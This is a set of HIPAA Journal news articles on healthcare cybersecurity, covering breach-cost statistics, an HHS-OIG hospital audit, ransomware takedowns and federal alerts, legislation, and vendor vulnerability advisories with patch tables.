Healthcare Cybersecurity

Average Cost of a Healthcare Data Breach Falls to $7.42 Million

IBM has published the 2025 Cost of a Data Breach Report, which shows a fall in the global average cost of a data breach, but an increase in the cost of U.S. data breaches, which have set a new record at $10.22 million, increasing by 9.2% from an average of $9.36 million in 2024. The higher data breach costs in the United States were largely due to higher regulatory fines and detection and escalation costs. Globally, data breach costs have fallen for the first time in five years to an average of $4.44 million.

global average cost of a data breach 2025. Source: IBM

Global average cost of a data breach in 2025 (in millions). Source: IBM

IBM has been releasing data breach cost reports for the past 20 years. This year, the study was conducted on 600 organizations of various sizes from 16 countries and geographic regions. Out of the 600 organizations participating in the study, 16% were located in the United States and Canada. The report is based on an analysis of data from organizations in 17 industries, 2% of which are in the healthcare industry.

There has been a fall in the cost of healthcare data breaches in the United States, which dropped by $2.35 million year-over-year to an average of $7.42 million. While the cost of a healthcare data breach has fallen significantly, healthcare data breaches are still the costliest out of all industries studied by IBM, and have been for the past 14 years.

Globally, the time to identify and contain a data breach fell to a 9-year low of 241 days, reducing by 17 days compared to 2024. IBM explains that the reduction in average containment time was largely due to a higher number of organizations detecting the data breach internally rather than being notified by an attacker. Healthcare data breaches took the longest to identify and contain, at an average of 279 days, five weeks longer than the global average breach lifecycle.

Phishing was the leading initial access vector in 2025, accounting for almost 16% of data breaches, replacing stolen credentials (10%), last year’s leading initial access vector, which fell to third spot behind supply chain compromise (15%). Ransomware continues to be a problem for healthcare organizations; however, more organizations are choosing not to pay ransoms. Last year, 59% of organizations that experienced a ransomware attack refused to pay the ransom, increasing to 63% this year.  With fewer organizations making payments, ransom demands have remained high, with an average of $5.08 million demanded for attacker-disclosed attacks. Fewer victims of ransomware attacks involve law enforcement, even though law enforcement involvement shaved an average of $1 million off data breach costs last year. In 2024, 52% of ransomware victims contacted and involved law enforcement, compared to 40% in 2025.

Data breaches invariably result in operational disruption, with almost all breached organizations reporting at least some disruption to operations as a result of a breach. The majority of breached organizations took more than 100 days to recover from a data breach. While breached organizations often absorb the cost of a data breach, this year, almost half of the organizations that suffered a data breach said they would be raising the price of goods and services as a result, with almost one-third planning to increase costs by 15% or more due to a data breach.

Each year, the cost of a data breach report identifies the main factors that increase or decrease breach costs. The biggest components in breach costs were detection and escalation ($1.47 million), lost business ($1.38 million), and post-breach response ($1.2 million), although IBM notes that detection and escalation costs fell by almost 10% compared to last year, and lost business and post-breach response costs also fell.

Based on a global average cost of $4.88 million, the most important factors for reducing data breach costs were adoptiong a DevSecOps approach (-$227K), AI-driven and ML-driven insights (-$223K), security analytics or SIEM (-$212K), threat intelligence (-$211K), and data encryption (-$208K). The main factors that increased breach costs were supply chain breaches (+$227K), security systems complexity (+$207K), shadow IT (+$200K), and AI tool adoption (+$193.5K).

Shadow IT – unauthorized use of software and devices – was a new addition to this year’s top three factors increasing data breach costs. Shadow IT increases the attack surface and creates a security blind spot, and IBM warns that many organizations are failing to look for shadow IT, so it remains undetected and can provide an easily exploitable backdoor into networks. On average, organizations with a high level of shadow IT experienced data breach costs $670K higher than organizations with a low level of shadow IT.

For this year’s report, IBM looked at the adoption of AI and found that AI adoption is outpacing governance. The majority of organizations that have adopted AI solutions said they did not have AI governance policies to mitigate or manage the risk of AI. Organizations lacking AI governance paid higher costs when breached. IBM has determined that AI models and applications are an emerging attack surface, especially in the case of shadow AI. This year, 13% of organizations reported a security incident involving an AI model or application that resulted in a data breach, and an overwhelming majority of those breached organizations – 97% – said they lacked proper AI access controls.

There has been growing concern about the use of generative AI by threat actors, such as for accelerating malware development and creating text and images for phishing and social engineering campaigns. IBM looked at the prevalence of AI-driven attacks and found that 16% of breaches involved the use of AI by attackers, with the majority of those attacks involving phishing (37%) or deepfakes (35%).

Last year, almost two-thirds of organizations said they would be increasing investment in cybersecurity over the next 12 months, but only 49% of organizations are planning to increase investment in the next 12 months. Fewer than half of the organizations planning to increase security investment said they were focusing on AI-driven solutions or services.

The post Average Cost of a Healthcare Data Breach Falls to $7.42 Million appeared first on The HIPAA Journal.

HHS-OIG Audit Finds Security Gaps at Large Northeastern Hospital

An audit of a large northeastern hospital by the Department of Health and Human Services Office of Inspector General (HHS-OIG) has identified cybersecurity gaps and weaknesses that are likely to be present in similarly sized hospitals across the country.

Cyberattacks on healthcare organizations have increased sharply in recent years. Between 2018 and 2022, there was a 93% increase in large data breaches reported to the HHS’ Office for Civil Rights (OCR) and a 278% increase in large data breaches involving ransomware. In 2022 alone, OCR received 64,592 reports of healthcare data breaches, across which the protected health information of 42 million individuals may have been exposed or stolen.

The HHS plays an important role in guiding and supporting the adoption of cybersecurity measures to protect patients and healthcare delivery from cyberattacks. The large number of successful cyberattacks raises questions about whether the HHS, including the Centers for Medicare and Medicaid Services (CMS) and OCR, could do more with its cybersecurity guidance, oversight, and outreach to help healthcare organizations implement robust cybersecurity controls and better protect their networks from attack.

While OCR usually conducts audits of HIPAA-regulated entities to assess cybersecurity and compliance with the HIPAA Rules, HHS-OIG’s 2025 Work Plan includes a series of 10 audits of U.S. hospitals to gain insights into healthcare cybersecurity and assess the cybersecurity measures that have been put in place. A northeastern hospital with more than 300 beds agreed to an audit to assess whether appropriate cybersecurity controls had been implemented for preventing and detecting cyberattacks, whether protocols had been developed for ensuring the continuity of care during a cyberattack, and the controls in place to protect Medicare enrollee data. The audited entity was not named due to the threat of cyberattacks.

The hospital is part of a network of providers that share protected health information for treatment, payment, and healthcare operations, and is a covered entity under HIPAA required to implement safeguards to ensure the confidentiality, integrity, and availability of protected health information. As a provider of healthcare services under the Medicare program, the hospital is also required to comply with the CMS Conditions of Participation (CoPs). The hospital had implemented measures to comply with the CoPs and HIPAA, and had voluntarily implemented the NIST Cybersecurity Framework to reduce and better manage cybersecurity risks

The hospital was found to have implemented data security measures to protect Medicare data and had effective cybersecurity controls to ensure continuity of care in the event of a cyberattack, including appropriate network architecture, backup strategies, incident response plans, and disaster recovery controls. HHS-OIG did, however, identify several cybersecurity weaknesses and security gaps.

HHS-OIG conducted several simulated cyberattacks on Internet-facing systems and found its cybersecurity controls, which included a web application firewall (WAF), were generally effective at blocking or limiting malicious requests. Simulated phishing emails were also sent to employees, and no employee responded or interacted with the fake website HHS-OIG had set up for the phishing scam.

HHS-OIG analyzed 26 internet-accessible systems and discovered two had weaknesses in their cybersecurity controls that could potentially be exploited by threat actors to gain access to systems. HHS-OIG also identified 13 web applications with cybersecurity weaknesses related to configuration management controls, and 16 Internet-accessible systems had weaknesses in their cybersecurity controls regarding identification and authentication that left them susceptible to interactions and manipulations by threat actors

HHS-OIG explained that the weaknesses occurred due to the integration of two systems with its existing IT environment without following security best practices. Further, while there were procedures for periodically assessing web application security controls, they were not effective at identifying weaknesses before they were potentially exploited, and industry web application security best practices had not been effectively implemented.

While the systems that were susceptible to some of the HHS-OIG’s simulated attacks did not contain patient data, compromising those systems could potentially provide attackers with a launch pad for conducting additional attacks against other systems, including systems that contained patient data. A threat actor could also use information gathered in an attack on a vulnerable system to conduct more convincing social engineering campaigns on the workforce.

The hospital concurred with all five HHS-OIG recommendations:

  • Enforce and periodically assess compliance with its configuration and change management policy.
  • Periodically assess and update its identification and authentication controls.
  • Periodically assess and update its configuration management controls.
  • Establish a policy or process to periodically assess its internet-accessible systems and application security controls for vulnerabilities.
  • Ensure developers follow secure coding practices.

The post HHS-OIG Audit Finds Security Gaps at Large Northeastern Hospital appeared first on The HIPAA Journal.

Feds Confirm Seizure of BlackSuit Ransomware Infrastructure

Homeland Security Investigations (HSI), the investigative arm of the Department of Homeland Security (DHS) and part of U.S. Immigration and Customs Enforcement (ICE), has released further information about last month’s seizure of dark web domains used by the BlackSuit ransomware group.

On July 24, 2025, the U.S. Department of Justice (DoJ) confirmed that an international law enforcement operation codenamed Operation Checkmate resulted in the seizure of domains used by the BlackSuit ransomware group. Banners were added to those sites confirming they were under the control of law enforcement. The sites were used by the BlackSuit ransomware group to leak data stolen and to communicate with victims to negotiate ransom payments.

The HSI confirmed in an August 7, 2025, announcement that BlackSuit was the successor to Royal ransomware. Both groups have terrorized critical infrastructure entities around the world since Royal emerged in 2022. Royal was the successor to Quantum ransomware, which is thought to be one of the groups operated by former members of the disbanded Conti ransomware operation.

Since 2022, Royal and BlackSuit have conducted more than 450 successful ransomware attacks on companies in the United States, including many critical infrastructure entities in healthcare, education, public safety, energy, and the government.  The ransomware groups engaged in double extortion, stealing data and encrypting files, demanding payment to prevent the data from being leaked and to obtain the decryption keys. Victims have paid the Royal and BlackSuit more than $370 million in ransom payments, based on current cryptocurrency values.

The operation involved the HSI Cyber Crimes Center, IRS Criminal Investigation’s Cyber Crimes Unit, the U.S. Secret Service, the FBI, Europol, and multiple international law enforcement partners, and resulted in the seizure of the group’s servers, domains, and digital assets used to support the group’s attacks, data theft, extortion, and money laundering.

“Disrupting ransomware infrastructure is not only about taking down servers — it’s about dismantling the entire ecosystem that enables cybercriminals to operate with impunity,” said HSI Cyber Crimes Center Deputy Assistant Director Michael Prado. “This operation is the result of tireless international coordination and shows our collective resolve to hold ransomware actors accountable.”

A DoJ announcement on August 11, 2025, explained that laundered cryptocurrency valued at $1,091,453 had been seized as part of the operation, along with four servers and nine domains. The DoJ explained that one of the victims of the Royal ransomware group paid a 49.3120227 Bitcoin ransom to decrypt their data, which was valued at $1,445,454.86 at the time of the transaction. Some of the proceeds, $1,091,453, were repeatedly deposited and withdrawn in a virtual currency exchange to hide the source of the funds. The funds were frozen by the exchange on or around January 9, 2024, and were obtained by U.S. authorities after issuing a warrant for seizure.

“The BlackSuit ransomware gang’s persistent targeting of U.S. critical infrastructure represents a serious threat to U.S. public safety,” said Assistant Attorney General for National Security John A. Eisenberg. “The National Security Division is proud to be part of an ongoing team of government agencies and partners working to protect our Nation from threats to our critical infrastructure.”

July 25, 2025: BlackSuit Ransomware Dark Web Sites Seized by Law Enforcement

The dark web sites of the BlackSuit ransomware group have been seized as part of an international law enforcement operation. The takedown includes BlackSuit’s negotiation and data leak sites, following a court order that authorized the seizure.

The dark web sites have been replaced with banners advising visitors about the seizure by U.S. Homeland Security Investigations, part of Operation CheckMate. Several law enforcement partners assisted with the operation, including the U.S. Department of Justice, Federal Bureau of Investigation (FBI), the U.S. Office of Foreign Assets Control (OFAC), Europol, the UK National Crime Agency, and law enforcement agencies in Canada, Germany, Ukraine, Lithuania, Ireland, and France. The Romanian cybersecurity firm BitDefender also assisted during the operation. The authorities have yet to make an announcement about the operation and any other achievements.

BlackSuit ransomware first appeared in June 2023, having rebranded following an attack on the City of Dallas in Texas. The group previously operated under the name Royal from September 2022 to June 2023. Prior to that, Royal operated under the name Quantum and is believed to have been started by members of the Conti ransomware group. Operating as BlackSuit, the group is thought to have claimed more than 180 victims worldwide and more than 350 victims under the name Royal.

While the takedown is good news, researchers have suggested that BlackSuit may have already rebranded or that some former members of BlackSuit have formed a new group, Chaos ransomware. Researchers at Cisco Talos explained in a June 24, 2025, blog post that they have assessed with moderate confidence that the new group was formed by members of the BlackSuit ransomware group due to similarities in the encryption methodology, ransom note, and toolset used in attacks. Chaos has already conducted at least ten attacks, mostly in the United States. The new group does not appear to be targeting any specific industries.

“The disruption of BlackSuit’s infrastructure marks another important milestone in the fight against organized cybercrime,” stated a representative of the Draco Team, Bitdefender’s cybercrime unit, who participated in the takedown. “We commend our law enforcement partners for their coordination and determination. Operations like this reinforce the critical role of public-private partnerships in tracking, exposing, and ultimately dismantling ransomware groups that operate in the shadows. When global expertise is aligned, cybercriminals have fewer places to hide.”

On July 28, 2025, FBI Dallas announced the seizure of 20 Bitcoins (now valued at $2.3 million) from a cryptocurrency address belonging to a member of the Chaos ransomware group. The funds were tracked to a Bitcoin wallet used by an affiliate with the moniker “Hors” who is suspected of conducting attacks and extorting payments from companies in the Northern District of Texas and elsewhere. The U.S. Department of Justice filed a civil complaint in the Northern District of Texas on July 24, 2025, seeking the forfeiture of the funds, which were seized by the FBI in Dallas in mid-April.

The post Feds Confirm Seizure of BlackSuit Ransomware Infrastructure appeared first on The HIPAA Journal.

Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint alert about the Interlock ransomware group, which has accelerated attacks on businesses and critical infrastructure organizations. The alert shares the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IoCs) collected from investigations of the group’s ransomware attacks in June 2025.

Interlock is a ransomware-as-a-service operation that first emerged in September 2024. The group has attacked entities in multiple sectors but appears to favor organizations in the healthcare and public health (HPH) sector. Healthcare victims include the kidney dialysis giant DaVita, Texas Tech University Health Sciences Center, Kettering Health, Drug and Alcohol Treatment Services, Brockton Neighborhood Health Center, and Naper Grove Vision Care.

Interlock is a financially motivated cybercriminal group that uses ransomware in its attacks on Windows and Linux systems, favoring attacks in North America and Europe. The group engages in double extortion tactics, breaching networks, stealing data, and demanding payment to decrypt files and prevent the publication of the stolen data on its dark web data leak site. The group’s TTPs are constantly evolving, and several new techniques have been observed in recent weeks.

One relatively unusual technique for a ransomware group is the use of compromised legitimate websites for drive-by downloads, disguising the payload as an installer for Google Chrome, Microsoft Edge, and other popular software solutions. These attacks distribute a remote access trojan, which provides initial access. The RAT executes a PowerShell script, which establishes persistence by dropping a file into the Windows Startup Folder to ensure it runs each time the user logs in. Alternatively, a PowerShell command is used to make a run key value in the Windows Registry for persistence.

The group has also been observed using the ClickFix social engineering technique for initial access. This involves tricking individuals into executing a malicious payload by convincing them that doing so will fix a problem on their device – blocking spam emails, removing a fictitious malware infection, etc.

Once initial access has been gained, tools such as Interlock RAT and NodeSnake RAT are used for C2 communications and command execution. The group has been observed using PowerShell to download a credential stealer and keylogger to harvest credentials for lateral movement and privilege escalation. Azure Storage Explorer is used to access Azure storage accounts, AzCopy is used to upload data to the Azure storage blob, and file transfer tools such as WinSCP have also been used for data exfiltration.

The authoring agencies have made several recommendations to mitigate Interlock threat activity, which include the following:

  • Implement a domain name filtering (DNS) solution to block access to malicious websites
  • Implement a web access firewall
  • Patch promptly and keep all software and operating systems up to date
  • Train end users to spot social engineering and phishing attempts
  • Segment networks to restrict lateral movement
  • Implement robust identity, credential, and access policies
  • Implement multifactor authentication on all accounts and services as far as possible, ideally phishing-resistant multi-factor authentication.
  • Ensure backups are made of the entire organization’s data infrastructure, and that backup data is encrypted, immutable, and stored securely off-site

 

The post Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike appeared first on The HIPAA Journal.

Bipartisan Healthcare Cybersecurity Act Introduced in House and Senate

Last week, a pair of bipartisan bills were introduced in the House of Representatives and Senate that seek to enhance the cybersecurity of the healthcare and public health (HPH) sector by improving coordination at the federal level to ensure that government agencies can respond quickly and efficiently to cyberattacks on HPH sector entities.

Healthcare cyberattacks have increased significantly in recent years, with more than 700 data breaches affecting 500 or more individuals reported to the HHS’ Office for Civil Rights in each of the past four years. In the past couple of years, a huge volume of healthcare records has been breached. In 2023, the protected health information of more than 172 million individuals was exposed or impermissibly disclosed in healthcare data breaches, and 278 million individuals were affected by healthcare data breaches in 2024.

In 2024, a ransomware group breached the systems of Change Healthcare, stole the records of an estimated 190 million individuals, and used ransomware to encrypt files. The attack caused massive disruption to the revenue cycles of healthcare providers across the country due to the prolonged outage of Change Healthcare’s systems, considerable disruption to patient care across the country, and the stolen data was leaked on the dark web.

The Healthcare Cybersecurity Act of 2025 was introduced by Congressman Jason Crow (D-CO), who was joined in introducing the legislation by Congressman Brian Fitzpatrick (R-PA). A companion bill was introduced in the Senate by Senators Jacky Rosen (D-NV) and Todd Young (R-IN). Congressman Crow previously introduced the Healthcare Cybersecurity Act in the 117th and 118th Congresses. “As technology advances, we must do more to protect Americans’ sensitive data,” said Congressman Crow. “That’s why I’m leading bipartisan legislation to strengthen our defenses and protect families from cyberattackers.”

If passed, the Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Department of Health and Human Services (HHS) would be required to collaborate on improving HPH sector cybersecurity. A liaison would be created between the two agencies to coordinate the responses to cyberattacks, and the act would authorize cybersecurity training for all relevant personnel. The bill also requires CISA and the HHS to conduct a study to identify the specific risks faced by the HPH sector.

“Cyberattacks on our healthcare system endanger more than data—they put lives at risk. I’ve long worked to strengthen our nation’s cyber defenses where Americans are most exposed, from small businesses to hospitals. This bipartisan bill takes direct, strategic action: empowering CISA and HHS to coordinate real-time threat sharing, expanding cybersecurity training for providers, and establishing a dedicated liaison to bolster response. We’re not just responding to attacks—we’re building the infrastructure to prevent them, protect patient privacy, and defend a vital pillar of our national security,” said Congressman Fitzpatrick.

The post Bipartisan Healthcare Cybersecurity Act Introduced in House and Senate appeared first on The HIPAA Journal.

High Severity Vulnerability Identified in MicroDicom DICOM Viewer

A high-severity vulnerability has been identified in the MicroDicom DICOM Viewer, a popular free-to-use software for viewing and manipulating DICOM medical images.

The vulnerability can be exploited remotely in a low complexity attack, and successful exploitation can allow the execution of arbitrary code on vulnerable installations of DICOM Viewer; however, user interaction is required to exploit the vulnerability. A threat actor would need to convince a user to open a malicious DICOM file locally or visit a specially crafted malicious web page, for example, through social engineering or phishing.

The vulnerability affects DICOM Viewer version 2025.2 (Build 8154) and prior versions and is tracked as CVE-2025-5943.  The vulnerability is an out-of-bounds write issue, where it is possible to write to memory outside the bounds of the intended buffer and execute arbitrary code. The vulnerability has been assigned a CVSS v4 base score of 8.6 out of 10 and a CVSS v3.1 base score of 8.8 out of 10. While there have been no known cases of the vulnerability being exploited in the wild at the time of disclosure, prompt patching is recommended. The vulnerability has been fixed in version 2025.3 and later versions.

The vulnerability was identified by independent security researcher Michael Heinzl, who reported the vulnerability to the U.S. Cybersecurity and Infrastructure Agency (CISA). The latest announcement follows a May 2025 disclosure of two high-severity vulnerabilities, a February 2025 disclosure of a medium-severity vulnerability that can be exploited in a machine-in-the-middle (MitM) attack, and four high-severity vulnerabilities identified in 2024 and disclosed in March and June last year.

Since vulnerabilities are frequently discovered, it is advisable to locate DICOM Viewer behind a firewall, to isolate it from business networks, and if remote access is required, to use a secure method of connection such as a Virtual Private Network (VPN) and ensure that the VPN is kept up to date.

The post High Severity Vulnerability Identified in MicroDicom DICOM Viewer appeared first on The HIPAA Journal.

Healthcare Organizations Take 3.7 Months To Announce Ransomware Data Breaches

A recent data analysis by Comparitech has revealed that the average time for a U.S. healthcare organization to report a ransomware attack is 3.7 months, the shortest time out of all industries represented in the study. Across all industries, the average time to report a ransomware attack in 2023 was 5.1 months, a considerable increase from the average of 2.1 months in 2018.

In 2024, ransomware-related data breaches took an average of 3.7 months to report, although it is too early to obtain reliable reporting data, as ransomware victims are still reporting ransomware-related data breaches from last year.

Comparitech’s researchers analyzed data from 2,600 U.S. ransomware attacks since 2018. Over the entire period of study, the average time to report a data breach following a ransomware attack was 4.1 months. The legal sector delayed reporting data breaches for the longest time, taking an average of 6.4 months to report the data breach.

While healthcare had the shortest breach reporting times, one healthcare entity had an exceptionally long delay between the date of the attack and the issuing of notifications. Ventura Orthopedics experienced a ransomware attack in July 2020, yet it took 38 months for notification letters to be issued, which were not sent until September 2023.  Another healthcare entity had an exceptionally long delay before notifications were issued. It took two years from the date of the attack for Westend Dental to issue notification letters, earning the company a $350,000 financial penalty.

The reporting time is no doubt influenced by federal and state laws. In healthcare, the Breach Notification Rule of the Health Insurance Portability and Accountability Act (HIPAA) requires regulated entities to report a data breach within 60 days of the date of discovery, and if the total number of affected individuals is not yet known, the regulated entity must report the breach using an estimated total for the number of affected individuals, with the estimated figure typically being 500 or 501. A figure of 500 affected individuals is the threshold for media announcements and public listing of the data breach on the HHS’ Office for Civil Rights breach portal.

Looking at the business sector only, healthcare also had one of the shortest delays, taking an average of 3.4 months to report the data breach, slightly ahead of utilities at 3.3 months. Healthcare businesses in this sector were not direct healthcare providers.

Comparitech also identified shorter breach reporting times in states that have implemented data breach notification laws, with an average time of 3.9 months to report a breach in those states compared to 4.2 months in other states. The states with the longest breach reporting times were Wyoming (7.3 months), the District of Columbia (6.6 months), and North Dakota (6.3 months), whereas the states with the shortest reporting periods were Montana (1.9 months), South Dakota (2.2 months), and Alaska (2.3 months).

While it may not be possible to issue notification letters quickly, it is important to announce ransomware attacks to allow potentially affected individuals to take steps to protect themselves. If it takes 4.1 months on average to report a ransomware-related data breach, that gives ample time for stolen data to be misused.

Ransomware groups that engage in double extortion list the stolen data on their data leak sites if the ransom is not paid, and the data can be downloaded by anyone. That means the data could be misused for several months before the affected individuals are notified. If a notice is added to the breached organization’s website, even if data theft has not been confirmed, consumers would be aware that they could potentially be at risk and could take steps to protect themselves.

The post Healthcare Organizations Take 3.7 Months To Announce Ransomware Data Breaches appeared first on The HIPAA Journal.

Microsoft, Fortinet & Ivanti Warn About Actively Exploited Zero Day Vulnerabilities

Microsoft, Fortinet & Ivanti have all notified customers about vulnerabilities in their products that are known to have been exploited by threat actors. Prompt patching is strongly recommended, and workaround/mitigations should be implemented if patching must be delayed.

Microsoft

On Patch Tuesday, Microsoft issued patches for five vulnerabilities known to have been exploited in the wild, plus two publicly disclosed zero-day vulnerabilities. The actively exploited  vulnerabilities are:

Product CVE Severity Type Outcome
Microsoft DWM Core Library CVE-2025-30400 Important Elevation of Privilege Local elevation of privilege to SYSTEM
Windows Common Log File System CVE-2025-32701 Important Elevation of Privilege Local elevation of privilege to SYSTEM
Windows Common Log File System CVE-2025-32706 Important Elevation of Privilege Local elevation of privilege to SYSTEM
Windows Ancillary Function Driver CVE-2025-32709 Important Elevation of Privilege Local elevation of privilege to SYSTEM
Microsoft Scripting Engine CVE-2025-30397 Important Memory Corruption Code execution

The following vulnerabilities have been publicly disclosed:

Product CVE Severity Type Outcome
Microsoft Defender CVE-2025-26685 Important Identity Spoofing Spoofing of another account over an adjacent network
Visual Studio CVE-2025-32702 Important Remote Code Execution Local code execution by an unauthenticated attacker

Microsoft also released patches for six critical vulnerabilities that are not known to have been exploited but should be prioritized. They affect Microsoft Office (CVE-2025-30377 and CVE-2025-30386), Microsoft Power Apps (CVE-2025-47733), Remote Desktop Gateway Service (CVE-2025-29967), and Windows Remote Desktop (CVE-2025-29966).

Fortinet

Fortinet has issued a security advisory about a critical vulnerability affecting its FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products. The stack-based buffer overflow vulnerability has been assigned a CVSS v4 severity score of 9.6 (CVSS v3.1: 9.8) and can be exploited by a remote unauthenticated hacker by sending HTTP requests with a specially crafted hash cookie. Successful exploitation of the vulnerability can allow arbitrary code execution.

Fortinet said it has observed exploitation of the vulnerability on FortiVoice. The threat actor scanned the device network, erased system crashlogs, and enabled fcgi debugging to log credentials from the system or SSH login attempts. The vulnerability is tracked as CVE-2025-32756 and affects the following product versions:

Affected Product Affected Versions Fixed Versions
FortiVoice 7.2.0 Upgrade to 7.2.1 or above
7.0.0 through 7.0.6 Upgrade to 7.0.7 or above
6.4.0 through 6.4.10 Upgrade to 6.4.11 or above
FortiRecorder 7.2.0 through 7.2.3 Upgrade to 7.2.4 or above
7.0.0 through 7.0.5 Upgrade to 7.0.6 or above
6.4.0 through 6.4.5 Upgrade to 6.4.6 or above
FortiMail 7.6.0 through 7.6.2 Upgrade to 7.6.3 or above
7.4.0 through 7.4.4 Upgrade to 7.4.5 or above
7.2.0 through 7.2.7 Upgrade to 7.2.8 or above
7.0.0 through 7.0.8 Upgrade to 7.0.9 or above
FortiNDR 7.6.0 Upgrade to 7.6.1 or above
7.4.0 through 7.4.7 Upgrade to 7.4.8 or above
7.2.0 through 7.2.4 Upgrade to 7.2.5 or above
7.1 all versions Migrate to a fixed release
7.0.0 through 7.0.6 Upgrade to 7.0.7 or above
1.1 through 1.5 Migrate to a fixed release
FortiCamera 2.1.0 through 2.1.3 Upgrade to 2.1.4 or above
2.0 all versions Migrate to a fixed release
1.1 all versions Migrate to a fixed release

Fortinet has issued indicators of Compromise in its security alert. If immediate patching is not possible, Fortinet recommends disabling the HTTP/HTTPS administrative interface

Ivanti

Ivanti has issued a security advisory about two vulnerabilities affecting the Ivanti Endpoint Manager Mobile (EPMM) solution, one is a medium severity flaw and the other is high severity flaw. The two vulnerabilities can be chained together and can allow unauthenticated remote code execution. Ivanti explained that the two vulnerabilities are associated with open-source code used in the EPMM, and not within Ivanti’s code.

The medium severity flaw is tracked as CVE-2025-4427 and is an authentication bypass flaw with a CVSS v3.1 severity score of 5.3. The second vulnerability is a remote code execution vulnerability with a CVSS v3.1 severity score of 7.2

Affected Product Affected Versions Fixed Versions
Ivanti Endpoint Mobile Manager 11.12.0.4 and prior 11.12.0.5 and later
12.3.0.1 and prior 12.3.0.2 and later
12.4.0.1 and prior 12.4.0.2 and later
12.5.0.0 and prior 12.5.0.1 and later

Ivanti said users should upgrade to the latest version as soon as possible; however, risk can be greatly reduced if the user filters access to the API using the built-in Portal ACLs or an external WAF.

The post Microsoft, Fortinet & Ivanti Warn About Actively Exploited Zero Day Vulnerabilities appeared first on The HIPAA Journal.

Ransomware Attacks Increase 123% in 2 Years with 52 New Groups Emerging in 2024

New research from Black Kite has shed light on the changing ransomware ecosystem. Over the past year, there has been a marked shift from large ransomware syndicates conducting the bulk of attacks to an increasingly fragmented ransomware ecosystem with a growing number of smaller groups and lone actors.

The report is based on data collected by the Black Kite Research & Intelligence Team (BRITE) between April 2024 and March 2025, including victim analysis, dark web intelligence gathering, and continuous monitoring of ransomware operations. Out of the 150 ransomware groups tracked by BRITE, 96 were considered active, having conducted at least one attack in the past 12 months, a sizeable increase from the 61 active ransomware groups in April 2023. Out of the 96 active ransomware groups, 52 are entirely new groups that emerged in the past 12 months. Over that period, there was a 24% year-over-year increase in the number of publicly disclosed ransomware victims (6,046), which follows an 81% increase over the preceding year, amounting to a 123% increase in disclosed ransomware victims in the past two years.

When the ransomware ecosystem was dominated by large ransomware syndicates such as LockBit and ALPHV/BlackCat, there was a degree of predictability to the attacks, but the power vacuum left by the law enforcement operations against LockBit and the shutdown of ALPHV has led to the creation of many smaller groups, with some of the more experienced actors branching out on their own. With so many new groups, the ransomware ecosystem has become more chaotic, with less sophisticated attacks being conducted in greater volume. BRITE reports that these smaller groups tend to lack the infrastructure, discipline, and credibility of their predecessors, and this shift has resulted in an increase in attack volume, a fall in coordination, and growing unpredictability in how, where, and why attacks unfold.

One trend that has emerged is a shift from attacks on larger companies with deeper pockets to attacks on small to medium-sized businesses (SMBs), which tend to have poorer defenses, smaller cybersecurity teams, and carry a lower risk of retaliation from law enforcement. The potential rewards from conducting the attacks are lower, with BRITE reporting a 35% reduction in ransom payment values in the past 12 months; however, the overall impact of ransomware attacks has widened. In 2024, the average ransom demand was $4,24 million, the median ransom payment was $2 million, and the average ransom payment was $553,959. SMBs with between $4 and $8 million appear to be the sweet spot in terms of ease of conducting attacks and ransom payment value.

In terms of targets, ransomware groups tend to conduct strategic attacks with the top three targets unchanged year-over-year. Manufacturing was the most targeted sector with 1,315 victims over the past 12 months. Attacks on the sector tend to result in massive disruption to business operations, with the costs of downtime increasing the probability of ransoms being paid. Professional and technical services were the second-most targeted sector with 1,040 attacks, followed by healthcare and social assistance with 434 known attacks.

In terms of the growth of attacks on different sectors, excluding the mass exploitation of vulnerabilities by the Clop group as an outlier, wholesale trade saw the biggest growth with a 2.27% increase in attacks, with healthcare and social assistance in second with 1.44% growth. Physicians and health practitioners overtook hospitals in terms of victim count, as they tend to have far weaker security, lack dedicated security teams, and handle reasonable volumes of sensitive patient data, making them low-hanging fruit with significant extortion potential.  These smaller healthcare providers accounted for 38% of attacks, with hospitals in second spot (20%), social assistance in third (11%), and nursing and residential facilities in fourth (9%).

BRITE also reports deeper entanglement in supply chains, with ransomware groups increasingly targeting third-party vendors, as an attack on a vendor can easily allow the ransomware actor to attack and attempt extortion on dozens of downstream organizations. BRITE reports that ransomware was behind 67% of all known third-party breaches. “Incidents involving Change Healthcare, Blue Yonder, and CDK Global made clear that ransomware’s impact is no longer contained within the four walls of the initially affected organization,” explained Black Kite in the report. “When threat actors compromise a widely used vendor, the effects ripple outward, paralyzing downstream businesses in multiple sectors. In this way, ransomware is increasingly a supply chain problem, not just a cybersecurity one.”

Black Kite predicts a deepening fragmentation of the ransomware ecosystem over the coming year, an increase in double targeting of victims with different ransomware variants deployed in a short space of time, speedier attacks with reduced dwell time between initial access and ransomware deployment, and increased automation and AI-assisted reconnaissance.

The post Ransomware Attacks Increase 123% in 2 Years with 52 New Groups Emerging in 2024 appeared first on The HIPAA Journal.